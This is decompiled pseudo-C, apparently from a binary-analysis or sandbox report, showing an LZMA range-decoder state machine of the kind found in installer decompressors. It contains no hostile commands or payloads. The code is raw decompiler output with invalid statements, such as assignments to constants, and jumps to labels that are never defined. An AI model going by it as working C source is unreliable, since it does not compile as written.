                                                                      								_t597 = _t540 & 0x0000ffff;
                                                                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                      								if( *(_t621 - 0xc) >= _t573) {
                                                                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                      									 *(_t621 - 0x40) = 1;
                                                                      									_t541 = _t540 - (_t540 >> 5);
                                                                      									 *_t614 = _t541;
                                                                      								} else {
                                                                      									 *(_t621 - 0x10) = _t573;
                                                                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                      								}
                                                                      								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                      									goto L139;
                                                                      								}
                                                                      								L137:
                                                                      								if( *(_t621 - 0x6c) == 0) {
                                                                      									 *(_t621 - 0x88) = 5;
                                                                      									L170:
                                                                      									_t576 = 0x22;
                                                                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                      									_t544 = 0;
                                                                      									L172:
                                                                      									return _t544;
                                                                      								}
                                                                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                      								L139:
                                                                      								_t542 =  *(_t621 - 0x84);
                                                                      								while(1) {
                                                                      									 *(_t621 - 0x88) = _t542;
                                                                      									while(1) {
                                                                      										L1:
                                                                      										_t543 =  *(_t621 - 0x88);
                                                                      										if(_t543 > 0x1c) {
                                                                      											break;
                                                                      										}
                                                                      										switch( *((intOrPtr*)(_t543 * 4 +  &M0040735D))) {
                                                                      											case 0:
                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                      													goto L170;
                                                                      												}
                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                      												_t543 =  *( *(_t621 - 0x70));
                                                                      												if(_t543 > 0xe1) {
                                                                      													goto L171;
                                                                      												}
                                                                      												_t547 = _t543 & 0x000000ff;
                                                                      												_push(0x2d);
                                                                      												asm("cdq");
                                                                      												_pop(_t578);
                                                                      												_push(9);
                                                                      												_pop(_t579);
                                                                      												_t617 = _t547 / _t578;
                                                                      												_t549 = _t547 % _t578 & 0x000000ff;
                                                                      												asm("cdq");
                                                                      												_t612 = _t549 % _t579 & 0x000000ff;
                                                                      												 *(_t621 - 0x3c) = _t612;
                                                                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                      													L10:
                                                                      													if(_t620 == 0) {
                                                                      														L12:
                                                                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                      														goto L15;
                                                                      													} else {
                                                                      														goto L11;
                                                                      													}
                                                                      													do {
                                                                      														L11:
                                                                      														_t620 = _t620 - 1;
                                                                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                      													} while (_t620 != 0);
                                                                      													goto L12;
                                                                      												}
                                                                      												if( *(_t621 - 4) != 0) {
                                                                      													GlobalFree( *(_t621 - 4));
                                                                      												}
                                                                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                      												 *(_t621 - 4) = _t543;
                                                                      												if(_t543 == 0) {
                                                                      													goto L171;
                                                                      												} else {
                                                                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                      													goto L10;
                                                                      												}
                                                                      											case 1:
                                                                      												L13:
                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                      													 *(_t621 - 0x88) = 1;
                                                                      													goto L170;
                                                                      												}
                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                      												_t45 = _t621 - 0x48;
                                                                      												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                      												__eflags =  *_t45;
                                                                      												L15:
                                                                      												if( *(_t621 - 0x48) < 4) {
                                                                      													goto L13;
                                                                      												}
                                                                      												_t555 =  *(_t621 - 0x40);
                                                                      												if(_t555 ==  *(_t621 - 0x74)) {
                                                                      													L20:
                                                                      													 *(_t621 - 0x48) = 5;
                                                                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                      													goto L23;
                                                                      												}
                                                                      												 *(_t621 - 0x74) = _t555;
                                                                      												if( *(_t621 - 8) != 0) {
                                                                      													GlobalFree( *(_t621 - 8));
                                                                      												}
                                                                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                      												 *(_t621 - 8) = _t543;
                                                                      												if(_t543 == 0) {
                                                                      													goto L171;
                                                                      												} else {
                                                                      													goto L20;
                                                                      												}
                                                                      											case 2:
                                                                      												L24:
                                                                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                      												 *(_t621 - 0x84) = 6;
                                                                      												 *(_t621 - 0x4c) = _t562;
                                                                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                      												goto L132;
                                                                      											case 3:
                                                                      												L21:
                                                                      												__eflags =  *(_t621 - 0x6c);
                                                                      												if( *(_t621 - 0x6c) == 0) {
                                                                      													 *(_t621 - 0x88) = 3;
                                                                      													goto L170;
                                                                      												}
                                                                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                      												_t67 = _t621 - 0x70;
                                                                      												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                      												__eflags =  *_t67;
                                                                      												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                      												L23:
                                                                      												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                      												if( *(_t621 - 0x48) != 0) {
                                                                      													goto L21;
                                                                      												}
                                                                      												goto L24;
                                                                      											case 4:
                                                                      												L133:
                                                                      												_t540 =  *_t614;
                                                                      												_t597 = _t540 & 0x0000ffff;
                                                                      												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                      												if( *(_t621 - 0xc) >= _t573) {
                                                                      													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                      													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                      													 *(_t621 - 0x40) = 1;
                                                                      													_t541 = _t540 - (_t540 >> 5);
                                                                      													 *_t614 = _t541;
                                                                      												} else {
                                                                      													 *(_t621 - 0x10) = _t573;
                                                                      													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                      													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                      												}
                                                                      												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                      													goto L139;
                                                                      												}
                                                                      											case 5:
                                                                      												goto L137;
                                                                      											case 6:
                                                                      												__edx = 0;
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__ecx =  *(__ebp - 0x38);
                                                                      													 *(__ebp - 0x34) = 1;
                                                                      													 *(__ebp - 0x84) = 7;
                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                      													L132:
                                                                      													 *(_t621 - 0x54) = _t614;
                                                                      													goto L133;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                      												__esi =  *(__ebp - 0x60);
                                                                      												__cl = 8;
                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                      												__ecx =  *(__ebp - 4);
                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                      														_t98 = __ebp - 0x38;
                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                      														__eflags =  *_t98;
                                                                      													} else {
                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                      													}
                                                                      												} else {
                                                                      													 *(__ebp - 0x38) = 0;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                      													__ebx = 0;
                                                                      													__ebx = 1;
                                                                      													goto L61;
                                                                      												} else {
                                                                      													__eax =  *(__ebp - 0x14);
                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                      														__eflags = __eax;
                                                                      													}
                                                                      													__ecx =  *(__ebp - 8);
                                                                      													__ebx = 0;
                                                                      													__ebx = 1;
                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                      													goto L41;
                                                                      												}
                                                                      											case 7:
                                                                      												goto L0;
                                                                      											case 8:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__ecx =  *(__ebp - 0x38);
                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                      												} else {
                                                                      													__eax =  *(__ebp - 0x38);
                                                                      													__ecx =  *(__ebp - 4);
                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                      													 *(__ebp - 0x84) = 9;
                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                      												}
                                                                      												while(1) {
                                                                      													L132:
                                                                      													 *(_t621 - 0x54) = _t614;
                                                                      													goto L133;
                                                                      												}
                                                                      											case 9:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													goto L89;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x60);
                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                      													goto L171;
                                                                      												}
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                      												__eflags = _t258;
                                                                      												0 | _t258 = _t258 + _t258 + 9;
                                                                      												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                      												goto L75;
                                                                      											case 0xa:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 4);
                                                                      													__ecx =  *(__ebp - 0x38);
                                                                      													 *(__ebp - 0x84) = 0xb;
                                                                      													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                      													while(1) {
                                                                      														L132:
                                                                      														 *(_t621 - 0x54) = _t614;
                                                                      														goto L133;
                                                                      													}
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x28);
                                                                      												goto L88;
                                                                      											case 0xb:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__ecx =  *(__ebp - 0x24);
                                                                      													__eax =  *(__ebp - 0x20);
                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                      												} else {
                                                                      													__eax =  *(__ebp - 0x24);
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x28);
                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                      												L88:
                                                                      												__ecx =  *(__ebp - 0x2c);
                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                      												L89:
                                                                      												__eax =  *(__ebp - 4);
                                                                      												 *(__ebp - 0x80) = 0x15;
                                                                      												__eax =  *(__ebp - 4) + 0xa68;
                                                                      												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                      												goto L68;
                                                                      											case 0xc:
                                                                      												L99:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t334 = __ebp - 0x70;
                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t334;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												__eax =  *(__ebp - 0x2c);
                                                                      												goto L101;
                                                                      											case 0xd:
                                                                      												L37:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t122 = __ebp - 0x70;
                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t122;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												L39:
                                                                      												__eax =  *(__ebp - 0x40);
                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                      													goto L48;
                                                                      												}
                                                                      												__eflags = __ebx - 0x100;
                                                                      												if(__ebx >= 0x100) {
                                                                      													goto L54;
                                                                      												}
                                                                      												L41:
                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                      												__ecx =  *(__ebp - 0x58);
                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                      												 *(__ebp - 0x48) = __eax;
                                                                      												__eax = __eax + 1;
                                                                      												__eax = __eax << 8;
                                                                      												__eax = __eax + __ebx;
                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                      												__ax =  *__esi;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__edx = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													 *(__ebp - 0x40) = 1;
                                                                      													__cx = __ax >> 5;
                                                                      													__eflags = __eax;
                                                                      													__ebx = __ebx + __ebx + 1;
                                                                      													 *__esi = __ax;
                                                                      												} else {
                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edx;
                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													goto L39;
                                                                      												} else {
                                                                      													goto L37;
                                                                      												}
                                                                      											case 0xe:
                                                                      												L46:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t156 = __ebp - 0x70;
                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t156;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												while(1) {
                                                                      													L48:
                                                                      													__eflags = __ebx - 0x100;
                                                                      													if(__ebx >= 0x100) {
                                                                      														break;
                                                                      													}
                                                                      													__eax =  *(__ebp - 0x58);
                                                                      													__edx = __ebx + __ebx;
                                                                      													__ecx =  *(__ebp - 0x10);
                                                                      													__esi = __edx + __eax;
                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      													__ax =  *__esi;
                                                                      													 *(__ebp - 0x54) = __esi;
                                                                      													__edi = __ax & 0x0000ffff;
                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      														__cx = __ax;
                                                                      														_t170 = __edx + 1; // 0x1
                                                                      														__ebx = _t170;
                                                                      														__cx = __ax >> 5;
                                                                      														__eflags = __eax;
                                                                      														 *__esi = __ax;
                                                                      													} else {
                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                      														0x800 = 0x800 - __edi;
                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      														__ebx = __ebx + __ebx;
                                                                      														 *__esi = __cx;
                                                                      													}
                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      														continue;
                                                                      													} else {
                                                                      														goto L46;
                                                                      													}
                                                                      												}
                                                                      												L54:
                                                                      												_t173 = __ebp - 0x34;
                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                      												__eflags =  *_t173;
                                                                      												goto L55;
                                                                      											case 0xf:
                                                                      												L58:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t203 = __ebp - 0x70;
                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t203;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												L60:
                                                                      												__eflags = __ebx - 0x100;
                                                                      												if(__ebx >= 0x100) {
                                                                      													L55:
                                                                      													__al =  *(__ebp - 0x44);
                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                      													goto L56;
                                                                      												}
                                                                      												L61:
                                                                      												__eax =  *(__ebp - 0x58);
                                                                      												__edx = __ebx + __ebx;
                                                                      												__ecx =  *(__ebp - 0x10);
                                                                      												__esi = __edx + __eax;
                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                      												__ax =  *__esi;
                                                                      												 *(__ebp - 0x54) = __esi;
                                                                      												__edi = __ax & 0x0000ffff;
                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                      													__cx = __ax;
                                                                      													_t217 = __edx + 1; // 0x1
                                                                      													__ebx = _t217;
                                                                      													__cx = __ax >> 5;
                                                                      													__eflags = __eax;
                                                                      													 *__esi = __ax;
                                                                      												} else {
                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                      													0x800 = 0x800 - __edi;
                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                      													__ebx = __ebx + __ebx;
                                                                      													 *__esi = __cx;
                                                                      												}
                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                      													goto L60;
                                                                      												} else {
                                                                      													goto L58;
                                                                      												}
                                                                      											case 0x10:
                                                                      												L109:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												_t365 = __ebp - 0x70;
                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                      												__eflags =  *_t365;
                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												goto L111;
                                                                      											case 0x11:
                                                                      												L68:
                                                                      												_t614 =  *(_t621 - 0x58);
                                                                      												 *(_t621 - 0x84) = 0x12;
                                                                      												while(1) {
                                                                      													L132:
                                                                      													 *(_t621 - 0x54) = _t614;
                                                                      													goto L133;
                                                                      												}
                                                                      											case 0x12:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													__eax =  *(__ebp - 0x58);
                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                      													while(1) {
                                                                      														L132:
                                                                      														 *(_t621 - 0x54) = _t614;
                                                                      														goto L133;
                                                                      													}
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x4c);
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                      												__ecx =  *(__ebp - 0x58);
                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                      												__eflags = __eax;
                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                      												goto L130;
                                                                      											case 0x13:
                                                                      												__eflags =  *(__ebp - 0x40);
                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                      													_t469 = __ebp - 0x58;
                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                      													__eflags =  *_t469;
                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                      													 *(__ebp - 0x40) = 8;
                                                                      													L144:
                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                      													goto L145;
                                                                      												}
                                                                      												__eax =  *(__ebp - 0x4c);
                                                                      												__ecx =  *(__ebp - 0x58);
                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                      												 *(__ebp - 0x30) = 8;
                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                      												L130:
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												 *(__ebp - 0x40) = 3;
                                                                      												goto L144;
                                                                      											case 0x14:
                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                      												__eax =  *(__ebp - 0x80);
                                                                      												 *(_t621 - 0x88) = _t542;
                                                                      												goto L1;
                                                                      											case 0x15:
                                                                      												__eax = 0;
                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                      												__al = __al & 0x000000fd;
                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                      												goto L120;
                                                                      											case 0x16:
                                                                      												__eax =  *(__ebp - 0x30);
                                                                      												__eflags = __eax - 4;
                                                                      												if(__eax >= 4) {
                                                                      													_push(3);
                                                                      													_pop(__eax);
                                                                      												}
                                                                      												__ecx =  *(__ebp - 4);
                                                                      												 *(__ebp - 0x40) = 6;
                                                                      												__eax = __eax << 7;
                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                      												 *(__ebp - 0x58) = __eax;
                                                                      												goto L145;
                                                                      											case 0x17:
                                                                      												L145:
                                                                      												__eax =  *(__ebp - 0x40);
                                                                      												 *(__ebp - 0x50) = 1;
                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                      												goto L149;
                                                                      											case 0x18:
                                                                      												L146:
                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                      													goto L170;
                                                                      												}
                                                                      												__ecx =  *(__ebp - 0x70);
                                                                      												__eax =  *(__ebp - 0xc);
                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
